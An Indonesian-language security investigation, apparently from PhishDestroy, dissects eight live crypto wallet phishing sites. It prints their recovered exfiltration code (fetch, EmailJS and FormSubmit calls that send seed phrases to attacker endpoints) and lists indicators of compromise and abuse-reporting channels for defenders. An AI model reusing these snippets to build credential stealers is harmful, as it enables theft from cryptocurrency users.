Kembali ke Berita
Penyelidikan Mendalam

Analisis Phishing Kripto:
8 Serangan Nyata yang Dianalisis

Kami berhasil mencegat lalu lintas phishing yang sedang berlangsung, melakukan rekayasa balik terhadap 5 program pencuri frasa benih, dan melacak data yang dicuri hingga ke bot Telegram, akun EmailJS, serta backend layanan Phishing-as-a-Service.

27 Maret 2026 Penelitian PhishDestroy Waktu baca: 18 menit
Analisis Penyelidikan Phishing Kripto
Analisis langsung terhadap lalu lintas phishing yang disadap mengungkap seluruh infrastruktur serangan
8Situs yang Dianalisis
7Metode Eksfiltrasi
1,824+Kredensial yang Dicuri
380+Merek Dompet
$0Biaya Penyerang

Apa yang Kami Temukan

Setiap hari, ribuan pengguna mata uang kripto kehilangan dananya akibat situs phishing yang tampak tak bisa dibedakan dari layanan dompet yang sah. Namun, apa yang terjadi di belakang Tombol "Connect Wallet" palsu itu? Ke mana sebenarnya frasa seed Anda disimpan?

Kami menyadap lalu lintas HTTP langsung dari 5 situs phishing yang aktif, mengunduh kode sumber lengkapnya, dan melacak setiap titik akhir pengaliran data hingga ke tujuan akhirnya. Penyelidikan ini mengungkap seluk-beluk lengkap phishing kripto modern — mulai dari trik rekayasa sosial yang membuat Anda mengetikkan frasa benih, hingga bot Telegram yang mengirimkannya kepada penyerang secara real-time.

Pernyataan Penolakan Tanggung Jawab

Semua frasa benih yang ditampilkan dalam artikel ini merupakan data uji yang dihasilkan secara acak. Tidak ada kredensial asli yang bocor selama penyelidikan ini. Semua situs tersebut telah dilaporkan kepada penyedia layanan hosting dan departemen penanggulangan penyalahgunaan masing-masing.

Pola Serangan Universal

Meskipun memiliki merek dan sistem backend yang berbeda-beda, kesembilan situs phishing tersebut mengikuti corong psikologis yang persis sama:

Halaman TujuanPembangunan kepercayaan
Pemilih Dompet60–110+ logo
Pesan palsu "Sedang terhubung..."Timer 3–5 detik
"Koneksi Gagal"Selalu gagal
Entri ManualBenih / Kunci / Penyimpanan Kunci
Pengeluaran dataTG / Email / API

Wawasan penting: animasi "Sedang terhubung..." selalu sudah diprogram sedemikian rupa agar gagal. Dalam kode sumber Situs #4, kami menemukan const success = false — tidak ada upaya untuk menghubungkan dompet. Seluruh alur ini hanya bertujuan untuk mengarahkan korban ke formulir "Hubungkan Secara Manual".

Rantai serangan phishing kripto enam langkah
Rantai serangan universal 6 langkah yang dimiliki oleh semua situs phishing yang kami analisis

8 Lokasi: Rincian Lengkap

1
Protokol Lapisan Jaringan
networklayers.pages.dev
LangsungCloudflare PagesBot Telegram + EmailJS

Peniruan identitas

Sebuah "protokol terdesentralisasi" fiktif untuk validasi dompet. Menggunakan ticker harga CryptoCompare secara real-time dan tautan ke penjelajah blockchain asli (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) untuk menjamin kredibilitasnya. Halaman utama menampilkan lebih dari 100 logo dompet dan proses "validasi" dalam 3 langkah.

Rantai Eksfiltrasi Ganda

Backend yang paling canggih di antara kelima sistem tersebut — setiap kredensial yang dicuri dikirim melalui dua saluran independen secara bersamaan:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Temuan OSINT

IndikatorNilai
Email PenipuBestgrace309@gmail.com
Bot Telegram@DewdropsTG_bot (ID: 7567323692)
Penerima Telegram@metatech2 (ID Obrolan: 7350941887)
Backendemailjs-backend-ovtg.onrender.com
Layanan EmailJSservice_d5qigxs / template_7bqxeaa
Domain Tersembunyilayerschain.in (dari penyamaran alamat email CF)
Pesan yang Dikirim1.824+ (dari ID pesan Telegram)
Usia Domain2 hari (TLS: 25 Maret 2026)
Kegagalan OPSEC

Alamat email pelaku ditemukan di sebuah Komentar JavaScript di dalam config.js: // Bestgrace309@gmail.com. Mereka lupa menghapusnya sebelum melakukan deployment. Selain itu, backend relay Telegram sepenuhnya terbuka — tanpa otentikasi, tanpa pembatasan laju. Dengan mendekode Cloudflare's data-cfemail Selain teknik pengaburan dalam kode HTML, kami juga menemukan alamat email tersembunyi: support@layerschain.in, yang terhubung dengan infrastruktur hosting di India dan Afrika Selatan.

2
Migrasi Token AQLA
token-aqla.pages.dev
LangsungCloudflare PagesFormulir yang Tidak Statis

Peniruan identitas

Penyalinan yang sempurna hingga tingkat piksel dari dunia nyata Aqualibre (AQLA) halaman migrasi token. Kode HTML tersebut berisi tag metadata yang menunjukkan sumbernya: data-scrapbook-source="https://token.aqla.app/migration", bertanggal 19 November 2024.

Pendekatan Tanpa Kode

Penyerang ini memerlukan tanpa kode di sisi server. Formulir tersebut mengirimkan data secara langsung ke Tidak statis — sebuah backend formulir yang sah untuk situs statis. Setiap pengiriman data diteruskan ke alamat email penipu. Alamat email penyerang adalah tidak pernah terlihat dalam kode sumber.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Biaya: $0

Cloudflare Pages: gratis. Un-static Forms: gratis. Tidak ada domain yang dibeli. Tidak ada server yang disewa. Total biaya infrastruktur: nol dolar.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
Langsung Cloudflare Pages Formulir yang Tidak Statis

Peniruan identitas

Subdomain tersebut berisi "safpal" — sebuah kesalahan ejaan yang disengaja dari SafePal, sebuah dompet perangkat keras yang populer. Situs tersebut menyamar sebagai "Blockchain Wallet Rectification" dengan 26 kategori masalah palsu. Menggunakan Typed.js untuk menampilkan animasi nama-nama rantai (Ethereum, BSC, Polygon...) dan ticker LiveCoinWatch untuk menambah kesan kredibilitas.

Perangkat yang Sama, Operator yang Sama?

Menggunakan templat phishing yang persis sama sebagai Lokasi #2: sama persis connect.html, sama persis wallets.html dengan lebih dari 60 logo, menggunakan backend Un-static yang sama (ID formulir yang berbeda — 6f1b82c3...da9943af). Kit yang identik tersebut sangat mengindikasikan satu operator yang mengelola kedua situs tersebut.

Hal-hal yang perlu diperhatikan dalam kode: "Privay Policy" (kurang huruf 'c'), "seperated" (seharusnya "separated"), "Kestore" (kurang huruf 'y'). Kolom kata sandi menggunakan type="text" daripada type="password".

4
Klon Jaringan Flare
flaremainnet.pages.dev
LangsungCloudflare PagesEmailJS Ganda (Redundansi)

Peniruan identitas

Sebuah tiruan yang nyaris sempurna dari Jaringan Flare portal — blockchain EVM Layer-1 sejati yang dilengkapi dengan protokol FTSO dan Data Connector. Meniru lebih dari 30 mitra ekosistem, antarmuka navigasi, dan identitas merek. Favicon dimuat dari domain typosquat: portal.flaremainet.com (ada satu huruf 'n' yang hilang dari kata "mainnet").

Redundansi Ganda EmailJS

Satu-satunya situs yang menggunakan dua akun EmailJS yang berbeda secara bersamaan untuk redundansi anti-Penghapusan:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Subjek email untuk setiap kasus pencurian: "New Wallet Details from Flare".

Ini Adalah Bisnis yang Mendapat Pendanaan

HTML tersebut berisi Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Perlindungan PPC Lunio, dan sebuah Piksel Iklan Twitter/X. Penyerang sedang menjalankan iklan berbayar untuk mengarahkan korban ke situs phishing dan menyaring klik bot. Ini bukan sekadar hobi — ini adalah operasi yang didanai dengan sistem analitik dan anggaran iklan.

Situs phishing Flare Network yang menggunakan kombinasi EmailJS dan iklan berbayar
Situs #4: iklan berbayar, pelacakan analitik, dan eksfiltrasi ganda — operasi yang paling profesional
5
COIN NODE / Perbaikan Dompet (PhaaS)
swiftauthapps.pages.dev
Backend MatiAPI PulseResolve (PhaaS)

Peniruan identitas

Layanan "COIN NODE" / "Wallet Fix" umum (tanpa merek tertentu). Hak Cipta "Wallet Fix 2022" — templat kit ini sudah berumur setidaknya 4 tahun. Gambar-gambar dihosting di pumpeth.com (WordPress di AWS).

Phishing sebagai Layanan

Arsitektur backend yang paling mengkhawatirkan: sebuah API multi-tenant berbasis UUID:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

Setiap penipu mendapatkan titik akhir UUID masing-masing. Seorang operator pusat mengelola API tersebut, memantau kampanye, dan kemungkinan mengambil bagian dari dana yang dicuri. Ini adalah pencurian kripto yang dilakukan secara terorganisir — model Phishing-as-a-Service.

Infrastruktur Terkait (Sebagian Besar Sudah Tidak Berfungsi)

DomainPeranStatus
api.pulseresolve.comAPI EksfiltrasiNXDOMAIN
walletissuesfix.netHost faviconNXDOMAIN
syncwallet.onlineLogo tuan rumahNXDOMAIN
pumpeth.comCDN GambarLangsung (AWS)
Antarmuka Pengguna Zombie

Backend-nya sudah mati, tapi... Frontend masih aktif di Cloudflare Pages. Jika penyerang mendaftarkan ulang pulseresolve.com, situs tersebut langsung dapat diakses kembali.

6
Pusat Bantuan + Pemulihan Buku Besar
wallet-support-39n.pages.dev & ledger-recovery.support
LangsungCloudflare Pages + ReplitAPI C2 KhususPengisian Otomatis BIP39

Peniruan identitas

A operasi dua arah: sebuah "Pusat Bantuan" umum di wallet-support-39n.pages.dev dengan 15 kategori penerbitan palsu dan 39 merek dompet, ditambah sebuah Klon proses orientasi pengguna Ledger yang persis sama hingga tingkat piksel di ledger-recovery.support dijalankan di Replit — lengkap dengan pilihan model perangkat, pengaturan PIN, dan kisi frasa benih berisikan 24 kata dengan Fitur autocomplete BIP39 yang sesungguhnya.

Backend C2 Anti-Pemindai

Halaman dukungan dompet mengirimkan data yang dicuri ke api.uranustoken.org/log — server C2 berbasis nginx/Ubuntu yang disesuaikan dan berada di balik Cloudflare. Bagian belakang secara sengaja memblokir semua permintaan GET (mengembalikan kode kesalahan 522 (timeout)), hanya merespons permintaan POST. Artinya, pemindai URL, crawler Google Safe Browsing, dan peneliti keamanan yang mengirimkan permintaan GET ke titik akhir tersebut tidak mendapatkan respons apa pun — server C2 tampak tidak aktif.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Klon Ledger ini menjalankan backend Express.js terpisah di Replit itu sendiri: POST /api/recovery-phrase mengumpulkan {deviceId, pin, phrase}. Hasilnya adalah 400 {"error":"Invalid data provided"} jika terjadi input yang tidak valid — untuk memastikan bahwa backend tersebut berlangsung dan sedang dilakukan validasi secara aktif data yang dicuri.

Temuan OSINT

IndikatorNilai
Frontend (Dompet)wallet-support-39n.pages.dev
Frontend (Ledger)ledger-recovery.support (34.111.179.208)
C2 Backend api.uranustoken.org → nginx/1.24.0 Ubuntu
Alamat IP C2104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Verifikasia43d3852-5304-47af-a61b-f0f6f3912736
Petugas PendaftaranName.com (ledger-recovery.support)
Telah diterapkan9 Januari 2026 (header Last-Modified)
Teknologi yang Digunakan React + Vite + Tailwind v4.1 + Framer Motion
Tingkat Ketepatan UX Tertinggi

Paket JS berukuran 466 KB tersebut berisi daftar kata BIP39 lengkap untuk fitur autocomplete real-time, terdapat 67 referensi ke "passphrase" dan 39 ke "mnemonic". Klon Ledger ini memandu korban melalui alur pendaftaran yang persis sama dengan perangkat Ledger asli — halaman phishing paling meyakinkan dalam seluruh penyelidikan ini. Halaman tersebut apiKey Kolom dalam konfigurasi tersebut menyarankan sebuah arsitektur PhaaS multi-tenant.

7
Platform Peluncuran Terdesentralisasi
mainnetvalidationapp.pages.dev
LangsungCloudflare PagesFormSubmit.co

Peniruan identitas

Sebuah "Decentralized Launchpad" umum dengan 21 kategori umpan (Staking, Migrasi, KYC, Giveaway, Klaim Hadiah, Pemulihan Aset, Prapenjualan, Pencetakan NFT, Akun yang Terkunci...) dan Lebih dari 70 merek dompet — salah satu daftar dompet paling lengkap yang pernah kami temui. Kesalahan ketik yang mencolok, yaitu "Sychronize" (tanpa huruf 'n'), mengungkap bahwa itu palsu.

Pipa FormSubmit Pipeline

Kegunaan FormSubmit.co — layanan pengiriman formulir ke email yang sah. Hash titik akhir a2cf4131f1a5d39453c7c183df96f86f adalah nilai MD5 dari alamat email penipu tersebut. Kami mencoba ratusan pola alamat email secara acak di Gmail, Yahoo, Hotmail, ProtonMail, Yandex, dan Mail.ru — tidak ada yang cocok. Penipu tersebut menggunakan alamat email yang tidak umum atau dihasilkan secara acak.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Temuan OSINT

IndikatorNilai
Domainmainnetvalidationapp.pages.dev
Hash FormSubmita2cf4131f1a5d39453c7c183df96f86f
ID KampanyeDAPP DESENTRALISASI
FontAwesome Kitbdc3291137 (kit #112310842, versi gratis v6.7.2)
jQuery3.2.1 + 3.5.1 dimuat secara bersamaan
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (tidak cocok)
Dua Pegangan Pelacak

FontAwesome Kit bdc3291137 — FontAwesome dapat mengidentifikasi pemilik akun di balik ID kit ini. Tag kampanye DAPP DECENTRALIZED mungkin muncul di situs phishing lain yang menggunakan hash FormSubmit yang sama. Setelah mencuri frasa benih, seorang kode QR palsu dan kode referensi acak yang terdiri dari 7 karakter ditampilkan: "Hubungi Admin dengan kode referensi unik Anda" — membuat para korban terus menunggu alih-alih melakukan penyelidikan.

8
R2 Bucket + PHP di Komputer Pribadi
pub-519769e9eb634616b1746c2018641d56.r2.dev
MatiCloudflare R2PHP + DDNS

Peniruan identitas

Tidak diketahui — baik frontend maupun backend sedang offline. Berdasarkan struktur payload, ini adalah serangan pencurian frasa benih dompet kripto. Serangan ini Bucket publik Cloudflare R2 (penyimpanan objek, bukan Pages) adalah sebuah vektor phishing yang telah didokumentasikan dengan baik dengan lebih dari 5.000 halaman berbahaya yang teridentifikasi dan peningkatan lalu lintas sebesar 61 kali lipat yang dilaporkan oleh Netskope.

Pengaturan Script Kiddie

Yang paling operasi dasar dalam koleksi ini. Frasa benih dikirim kata demi kata ke skrip PHP yang berjalan di komputer pribadi atau VPS yang terhubung ke layanan DNS gratis:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Temuan OSINT

IndikatorNilai
Frontend pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE]
Backend mercifuljigga4real123.publicvm.com [NXDOMAIN]
ID R2 Bucket519769e9eb634616b1746c2018641d56
Penyedia DDNS DNSExit.com / Netdorm, Inc. (Cincinnati, OH)
DNS NSns10–13.dnsexit.com
Nama Penggunamercifuljigga4real123
Nama Pengguna OSINT: mercifuljigga4real123

"Merciful" + "jigga" (julukan Jay-Z) + "4real" + "123" — nama pengguna yang sangat personal dan menunjukkan kecintaannya pada budaya hip-hop. Tidak ditemukan di platform mana pun yang terindeks: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch, atau Steam. Kemungkinan aktif di Discord, Telegram, atau platform game dengan nama ini atau variasi yang mirip. Nama file fuc.php sesuai dengan gaya yang tidak konvensional dari gagangnya.

7 Cara untuk Mencuri Frasa Benih Anda

Perbandingan Empat Metode Eksfiltrasi Data Melalui Phishing Kripto
Tujuh arsitektur eksfiltrasi yang berbeda yang digunakan di delapan situs phishing tersebut
MetodeSitusCara KerjanyaKecepatanBiaya
Bot Telegram#1 Express.js di Render.com bertindak sebagai perantara ke Bot API. Penipu langsung menerima pesan langsung (DM) berisi kredensial. Secara real-time$0
EmailJS#1, #4 JavaScript sisi klien mengirimkan data secara langsung ke API EmailJS, yang kemudian meneruskannya ke alamat email penipu. ~1 menit$0
Formulir yang Tidak Statis#2, #3 Formulir HTML standar dengan metode POST ke layanan formulir yang sah, yang meneruskan kiriman melalui email. ~1 menit$0
FormSubmit.co#7 jQuery AJAX ke FormSubmit.co. Alamat email disembunyikan di balik hash MD5. Kampanye diberi tag "DAPP DECENTRALIZED". ~1 menit$0
API C2 Khusus#6 React SPA mengirimkan permintaan ke API nginx/Express yang berada di balik Cloudflare. Menolak permintaan GET (522) untuk menghindari pemindai. Hanya merespons permintaan POST. Secara real-time~$5 per bulan
PHP + DDNS#8 Skrip PHP di komputer pribadi melalui layanan DNS gratis (publicvm.com). Frasa benih dikirim kata demi kata. Secara real-time$0
API PhaaS#5 API multi-tenant berbasis UUID. Operator pusat mengelola bagian belakang sistem, sedangkan para penipu menyewa titik akhir. Secara real-timeTidak diketahui

7 Tanda Peringatan yang Mengungkap Setiap Situs Phishing

Jika Anda melihat apa pun Jika Anda menemui hal-hal berikut, segera tutup tab tersebut:

1. Pesan "Koneksi Gagal" selalu palsu

Koneksi dompet yang sesungguhnya menggunakan protokol WalletConnect atau ekstensi browser. Koneksi tersebut tidak pernah menampilkan pesan kesalahan "Koneksi Gagal" yang meminta Anda untuk memasukkan frasa benih.

2. 50–110+ logo dompet digital, satu platform

Setiap ikon dompet mengarah ke formulir yang sama. Layanan yang sesungguhnya akan mengintegrasikan SDK asli dari masing-masing dompet.

3. "Kesalahan" setelah Anda mengirimkan

Pesan kesalahan palsu "503 Error" atau "Unknown Error" yang muncul setelah pengiriman dilakukan secara sengaja. Data Anda sudah dicuri — pesan kesalahan tersebut bertujuan menipu Anda agar mencoba lagi dengan dompet digital lain.

4. Di-hosting di .pages.dev

Kelima situs tersebut menyalahgunakan layanan gratis Cloudflare Pages. Tidak diperlukan verifikasi identitas. Penyalahgunaan Cloudflare Pages untuk aksi phishing meningkat sebesar 198% pada tahun 2025.

5. Tiga tab: Frasa / Kunci Pribadi / Keystore

Tidak ada layanan resmi yang memerlukan ketiga jenis kredensial tersebut. Formulir dengan tiga tab ini merupakan ciri khas dari perangkat phishing.

6. Tidak ada interaksi dengan blockchain

Tak satu pun dari situs-situs ini bisa dimuat ethers.js, web3.js, atau melakukan panggilan RPC apa pun. Itu hanyalah formulir HTML murni yang menyamar sebagai dApps.

7. Infrastruktur tanpa biaya

Hosting gratis + layanan formulir gratis + layanan pesan gratis = operasi phishing lengkap dengan biaya $0. Jika situs tersebut tidak memiliki domain asli, waspadalah.

Tabel IOC Lengkap

Bagi tim keamanan, platform intelijen ancaman, dan pelapor penyalahgunaan:

Domain & Infrastruktur

DomainJenisStatus
networklayers.pages.devAntarmuka phishingLangsung
token-aqla.pages.devAntarmuka phishingLangsung
antiresolve-mysafpalnode.pages.devAntarmuka phishingLangsung
flaremainnet.pages.devAntarmuka phishingLangsung
swiftauthapps.pages.devAntarmuka phishingLangsung
emailjs-backend-ovtg.onrender.comBackend relai TGLangsung
portal.flaremainet.comAset typosquatTidak diketahui
layerschain.inDomain terkaitDNS tidak berfungsi
api.pulseresolve.comBackend PhaaSNXDOMAIN
walletissuesfix.netPenyedia asetNXDOMAIN
syncwallet.onlineLogo tuan rumahNXDOMAIN
pumpeth.comCDN GambarLangsung (AWS)
wallet-support-39n.pages.devAntarmuka phishingLangsung
ledger-recovery.supportPhishing Ledger (Replit)Langsung
api.uranustoken.orgBackend C2 (nginx/Ubuntu)Langsung
uranustoken.orgDomain akar404
mainnetvalidationapp.pages.devAntarmuka phishingLangsung
pub-519769e9eb634616b1746c2018641d56.r2.devPhishing (kelompok R2)Offline
mercifuljigga4real123.publicvm.comBackend PHP (DDNS)NXDOMAIN

Akun & Pengenal

JenisNilaiSitus
EmailBestgrace309@gmail.com#1
Email (disembunyikan)support@layerschain.in#1
Bot Telegram@DewdropsTG_bot (7567323692)#1
Pengguna Telegram@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Formulir yang Tidak Statisc78173e2d991...94c3f76#2
Formulir yang Tidak Statis6f1b82c3ce55...da9943af#3
UUID PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Instansi Renderrndr-id: ed83576e-b1b3-4c82#1
Replit Verifikasia43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 Pengiriman Formulira2cf4131f1a5d39453c7c183df96f86f#7
Tag KampanyeDAPP DESENTRALISASI#7
FontAwesome Kitbdc3291137 (kit #112310842)#7
ID R2 Bucket519769e9eb634616b1746c2018641d56#8
Nama Pengguna/DDNSmercifuljigga4real123#8

Ke Mana Harus Melaporkan Upaya Phishing Terkait Kripto

Ke mana harus melaporkan situs phishing kripto — penghapusan multi-vektor
Menargetkan layanan hosting, layanan backend, dan platform pesan secara bersamaan untuk kecepatan penghapusan yang maksimal
LayananApa yang Harus DilaporkanBagaimana
Cloudflare7x .pages.dev + 1x bucket R2abuse.cloudflare.com
Google Safe BrowsingSemua URL phishingLaporkan Phishing
PhishTankSemua URL untuk daftar blokir komunitasphishtank.org
EmailJS3 akun yang disalahgunakan (ID layanan di atas)abuse@emailjs.com
Tidak statis2 titik akhir formulirHubungi kami melalui un-static.com
Render.comBackend relai TelegramFormulir pelaporan penyalahgunaan
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comLaporan penyalahgunaan Google
Twitter/XAkun iklan yang mempromosikan Situs #4Laporan penyalahgunaan iklan X
FormSubmit.coHash a2cf4131... (#7)Formulir Pengaduan Penyalahgunaan FormSubmit
Replitledger-recovery.support (#6)Laporan penyalahgunaan Replit
Name.comPendaftar untuk ledger-recovery.supportPelaporan Penyalahgunaan di Name.com
DNSExitmercifuljigga4real123.publicvm.comPenyalahgunaan dnsexit.com
FontAwesomeKit bdc3291137 (#7)Penyalahgunaan FontAwesome
ChainabuseSemua kampanye phishingChainabuse.com

Cara Melindungi Diri Anda

Aturan Emas

Tidak ada layanan resmi pun yang akan meminta Anda untuk memasukkan frasa benih Anda ke dalam situs web. Frasa benih hanya dimasukkan ke dalam perangkat lunak dompet resmi saat proses pemulihan dompet — jangan pernah dimasukkan di situs web pihak ketiga yang mengklaim sebagai layanan "validasi", "sinkronisasi", atau "pemulihan".

Sebelum menghubungkan dompet apa pun:

  • Pastikan URL tersebut sesuai dengan domain resmi. Periksa detail sertifikat SSL.
  • WalletConnect yang asli menggunakan kode QR atau tautan langsung — bukan formulir frasa benih.
  • Jika "koneksi gagal" dan Anda diminta memasukkan kredensial secara manual — itu adalah serangan phishing.
  • Periksa URL yang mencurigakan di PhishTank atau VirusTotal sebelum berinteraksi.
  • Gunakan dompet perangkat keras — dompet ini memerlukan konfirmasi fisik untuk setiap transaksi.
  • Tandai URL resmi. Jangan pernah mengklik tautan dari iklan, pesan langsung (DM), atau media sosial.

Taksonomi Phishing Kripto

Penipu yang mencuri frasa benih hanyalah salah satu kategori. Berikut ini gambaran lengkap tentang phishing kripto — kami akan menyajikan pembahasan mendalam mengenai setiap jenisnya.

Pencuri Frasa Benih
Halaman palsu "Connect Wallet" yang menipu Anda agar memasukkan frasa pemulihan Anda. Fokus artikel ini — 5 contoh nyata yang dianalisis secara mendalam.
Telah Dibahas di Atas
Penyalahgunaan Proses Persetujuan
Aplikasi terdesentralisasi (dApps) berbahaya yang meminta persetujuan penggunaan token tanpa batas melalui MetaMask. Begitu disetujui, penyerang akan menguras dompet Anda tanpa perlu mengetahui frasa benih Anda.
Segera Hadir
Ice Phishing (Permit2)
Memanfaatkan celah keamanan pada izin tanpa gas EIP-2612. Korban menandatangani pesan di luar rantai yang memberikan hak transfer token — tidak ada persetujuan di dalam rantai yang terlihat hingga proses pengurasan terjadi.
Segera Hadir
Klaim Airdrop Palsu
Airdrop token palsu yang mengharuskan Anda "mengklaim" melalui kontrak pintar berbahaya. Transaksi klaim tersebut sebenarnya memindahkan token asli Anda ke luar.
Segera Hadir
Program yang Mencuri Data dari Clipboard
Malware yang memantau papan klip Anda dan secara diam-diam mengganti alamat dompet yang telah disalin dengan alamat penyerang sebelum Anda menempelkannya.
Segera Hadir
Membersihkan Debu + Keracunan
Transaksi-transaksi kecil dari alamat yang mirip mengotori riwayat Anda. Korban menyalin alamat palsu tersebut dari riwayat transaksi untuk transfer berikutnya.
Segera Hadir

Kebenaran yang Tak Nyaman

Biaya yang diperlukan untuk menyiapkan operasi phishing kripto $0 dan membutuhkan kurang dari 30 menit. Layanan hosting gratis, layanan formulir gratis, bot pesan gratis. Pelaku serangan di balik Situs #1 telah mencuri kredensial dari 1.824+ korban. Situs #4 sedang beroperasi iklan berbayar secara besar-besaran. Ini bukan main-main — ini adalah sebuah industri. Satu-satunya cara untuk melindungi diri adalah dengan meningkatkan kewaspadaan.

Bantu Kami Melawan

PhishDestroy melacak dan melaporkan situs phishing kripto secara real-time. Jika Anda menemukan situs yang mencurigakan, laporkan kepada kami — kami akan menyelidikinya dan berupaya agar situs tersebut ditutup.

Penyelidikan Terkait

Penyelidikan
Akhir dari xmrwallet.com: NameSilo Berbohong untuk Melindungi Seorang Pencuri
Pencurian Monero yang berlangsung selama 10 tahun. Tiga penyedia layanan pendaftaran domain terlibat. NameSilo mengarang 7 kebohongan.
Analisis Mendalam
Jaringan Penyedot Kripto: Infrastruktur yang Terungkap
Bagaimana layanan "drainer-as-a-service" berbagi infrastruktur dan operator.
Panel Terbuka
Panel Phishing Trust Wallet: Akses Admin Penuh
Kami berhasil mengakses panel admin dari operasi phishing Trust Wallet.
Infrastruktur
Infrastruktur Penipuan Terungkap: Backend Bersama
Bagaimana operasi penipuan berbagi server, templat, dan alur pembayaran.

Bagikan Investigasi Ini

X / Twitter Telegram Reddit LinkedIn

Penyelidikan Terkait

Panel Phishing Trust Wallet: $239K Dicuri, 6 Pelaku
PENELITIAN MENDALAM
Panel Phishing Trust Wallet: $239K Dicuri, 6 Pelaku
Crypto Drainer Toolkit: Para Penjual Kembali Angel Drainer Terbongkar
PENELITIAN MENDALAM
Crypto Drainer Toolkit: Para Penjual Kembali Angel Drainer Terbongkar
Penipu Terbongkar: 4 Sistem Belakang Penipuan Dibedah
PENYELIDIKAN
Penipu Terbongkar: 4 Sistem Belakang Penipuan Dibedah